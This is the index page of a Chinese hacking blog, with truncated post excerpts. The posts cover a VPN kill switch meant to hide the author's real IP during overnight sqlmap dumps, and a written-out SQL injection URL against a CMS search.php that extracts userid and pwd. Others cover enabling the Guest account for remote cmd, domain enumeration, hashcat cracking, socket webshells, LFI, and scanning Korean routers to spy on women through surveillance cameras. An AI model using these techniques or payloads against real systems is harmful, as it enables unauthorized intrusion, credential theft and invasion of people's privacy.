小马博客

一个无聊的人,一个无聊的博客

MacOS/Ubuntu等Linux通用的检查VPN脚本,当VPN断线了自动关闭网卡。 问:什么时候会用到? 答:例如sqlmap在半夜dump数据的时候,你在睡觉,VPN断掉了,啊哈哈哈,全是真实IP去DUMP,好玩吧。 原理:ping vpn网关,ping不通N次,则shu...

发布 0 条评论

看见最近大家讨论远程调用cmd比较热,所以就想写一下自己使用远程调用CMD的一些小结 主要细节请参考 http://lcx.cc/?i=3221 我以windows 2003系统做演示. 1.激活本地Guest账号 2.在组策略中将 网络访问: 本地帐户的共享和安全模型 改...

发布 0 条评论

首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32...

发布 1 条评论

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成 功" /v ^|find "The command completed successfully." /v ^|find "命...

发布 0 条评论

在实际工作中我们经常会用到对身份证进行验证的操作,比如员工档案中身份信息的管理等等。长达18位的数字谁也不敢说每次都能绝对的输入正确,如果能对输入的身份证进行一下验证的话,会最大限度的保证资料的正确性。 接着我们来说说18...

发布 0 条评论

其实主要是来科普下hashcat系列的,如果用过的就撸过吧。 Hashcat-plus是目前我见过的支持算法最多的GPU破解工具,支持Windows和Linux。另外带了Jumbo补丁的John貌似也不错,没怎么用过,不发表评论。 Hashcat系列有3个版本,这也是很...

发布 1 条评论

0x01 前言 常规的webshell都是调用该语言中习惯函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。 常见的脚本语言asp,php,jsp,都可以实现对应的socket编程。例如使用msf...

发布 0 条评论

前言: 有次在群里见一基友发了张监控的截图,说是扫韩国路由扫到的。。。 小菜便萌发了偷窥妹子的想法,所以有了此文 0x00 什么是视频监控? 视频监控是安全防范系统的重要组成部分,它是一种防范能力较强的综合系统。视频监控以其直...

发布 4 条评论

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络. 关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 大家都懒得测试,我就来整理下. 1.普通本地包含; <?p...

发布 0 条评论